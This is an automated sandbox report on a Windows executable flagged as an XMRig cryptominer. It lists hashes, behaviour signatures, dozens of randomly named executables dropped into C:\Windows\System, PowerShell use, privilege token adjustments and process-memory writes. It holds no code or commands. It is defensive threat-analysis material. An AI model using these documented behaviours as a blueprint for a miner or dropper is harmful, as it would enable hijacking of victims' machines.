Malware Analysis Report

2025-04-19 18:40

Sample ID 240527-gzvqvabe57
Target 22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe
SHA256 06262ab254bf611673e763f214b1702d44641f8eb99f03062ec7287b7241cdaa
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06262ab254bf611673e763f214b1702d44641f8eb99f03062ec7287b7241cdaa

Threat Level: Known bad

The file 22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:15

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:15

Reported

2024-05-27 06:17

Platform

win7-20231129-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\LlqKjMW.exe N/A
N/A N/A C:\Windows\System\YxfdizT.exe N/A
N/A N/A C:\Windows\System\CqmuYOt.exe N/A
N/A N/A C:\Windows\System\xpSnzVh.exe N/A
N/A N/A C:\Windows\System\mAPeyGv.exe N/A
N/A N/A C:\Windows\System\BTUQqJJ.exe N/A
N/A N/A C:\Windows\System\jIpWIOQ.exe N/A
N/A N/A C:\Windows\System\OWshedB.exe N/A
N/A N/A C:\Windows\System\aRdLAWV.exe N/A
N/A N/A C:\Windows\System\woimUer.exe N/A
N/A N/A C:\Windows\System\lPinlgR.exe N/A
N/A N/A C:\Windows\System\kUGFVWr.exe N/A
N/A N/A C:\Windows\System\KkKcEWF.exe N/A
N/A N/A C:\Windows\System\eebjxNd.exe N/A
N/A N/A C:\Windows\System\gyBVRSz.exe N/A
N/A N/A C:\Windows\System\bChjwQt.exe N/A
N/A N/A C:\Windows\System\TyAHvvX.exe N/A
N/A N/A C:\Windows\System\uVlSmoO.exe N/A
N/A N/A C:\Windows\System\HKvGVLD.exe N/A
N/A N/A C:\Windows\System\NRzpmRj.exe N/A
N/A N/A C:\Windows\System\IbmqqGg.exe N/A
N/A N/A C:\Windows\System\aZDDHpW.exe N/A
N/A N/A C:\Windows\System\bpXpuCF.exe N/A
N/A N/A C:\Windows\System\jhmPsGZ.exe N/A
N/A N/A C:\Windows\System\QspGHFu.exe N/A
N/A N/A C:\Windows\System\MVDnatk.exe N/A
N/A N/A C:\Windows\System\gMutRvB.exe N/A
N/A N/A C:\Windows\System\AfwsfgN.exe N/A
N/A N/A C:\Windows\System\ALsarBM.exe N/A
N/A N/A C:\Windows\System\RDbxMZD.exe N/A
N/A N/A C:\Windows\System\PeGyTTM.exe N/A
N/A N/A C:\Windows\System\qvQaBAe.exe N/A
N/A N/A C:\Windows\System\hZbFCdx.exe N/A
N/A N/A C:\Windows\System\aAgNunv.exe N/A
N/A N/A C:\Windows\System\WImwSLW.exe N/A
N/A N/A C:\Windows\System\llWLZvv.exe N/A
N/A N/A C:\Windows\System\AKzOFxt.exe N/A
N/A N/A C:\Windows\System\NWOYoUs.exe N/A
N/A N/A C:\Windows\System\cBXiPFt.exe N/A
N/A N/A C:\Windows\System\FPppyfT.exe N/A
N/A N/A C:\Windows\System\cJVLsyx.exe N/A
N/A N/A C:\Windows\System\dFhAQPB.exe N/A
N/A N/A C:\Windows\System\LqcjFtN.exe N/A
N/A N/A C:\Windows\System\IExxHqq.exe N/A
N/A N/A C:\Windows\System\CNMuNTa.exe N/A
N/A N/A C:\Windows\System\NDDBsLZ.exe N/A
N/A N/A C:\Windows\System\tANnSAq.exe N/A
N/A N/A C:\Windows\System\EUNtkoe.exe N/A
N/A N/A C:\Windows\System\WiEuxrN.exe N/A
N/A N/A C:\Windows\System\TEKOxOQ.exe N/A
N/A N/A C:\Windows\System\XvdgOnu.exe N/A
N/A N/A C:\Windows\System\ygtQLbK.exe N/A
N/A N/A C:\Windows\System\PPfEcLL.exe N/A
N/A N/A C:\Windows\System\IuQDHiU.exe N/A
N/A N/A C:\Windows\System\FIEdHMw.exe N/A
N/A N/A C:\Windows\System\ZgaxPsx.exe N/A
N/A N/A C:\Windows\System\wCPZUEo.exe N/A
N/A N/A C:\Windows\System\QXsWejh.exe N/A
N/A N/A C:\Windows\System\eMHAsZY.exe N/A
N/A N/A C:\Windows\System\SOVtvFZ.exe N/A
N/A N/A C:\Windows\System\wHjZtzX.exe N/A
N/A N/A C:\Windows\System\jNptcjZ.exe N/A
N/A N/A C:\Windows\System\ZXTTGWq.exe N/A
N/A N/A C:\Windows\System\jPbAtKY.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\tlIpNuV.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbhxAJI.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\CqmuYOt.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\MZkQjlM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\OeBOtXF.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\bXBMNQM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BpyKaCm.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\owoGOBJ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\HEIqyic.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\UGCDkII.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XwrfRaW.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\UsPWPfh.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\VLHhBzD.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BXJopLZ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\GUZtwss.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BCKpDae.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\jTVwIeC.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\AJgaYDy.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\OIDaZpQ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BWUSolV.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\JpEZyeX.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\ustnvBY.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\DLSxowk.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\wysEUhq.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\ryAqmYC.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\zzqLDFP.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\vxpMNYX.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\aUEvZnt.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XlWfTHg.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\hwxMAzS.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\bChjwQt.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\OoAWNKA.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\hRBmeei.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\kFVjrmN.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\MuPTwTM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\SefzmlB.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\irbshFA.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\gIdfmCv.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\HzTepRD.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XsKpAGE.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\VGMmMpz.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\hUYikzr.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\OqDecUZ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BcHEAHq.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\TmYhWxZ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\WhwRYpE.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\eTknzpk.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XqtsqNM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\pBViVYU.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\CUjSRgy.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\NHjLObL.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\bejKjXB.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XyMAXTL.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\SqwPuDe.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\dkoOlhJ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\vogDpYn.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\foFhahU.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\ysPpBBa.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\IsBFGMg.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\KvRYIfP.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\flQoype.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\oKIWeeR.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\fCBnmNn.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\kWDWIEz.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2356 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LlqKjMW.exe
PID 2356 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LlqKjMW.exe
PID 2356 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LlqKjMW.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\xpSnzVh.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\xpSnzVh.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\xpSnzVh.exe
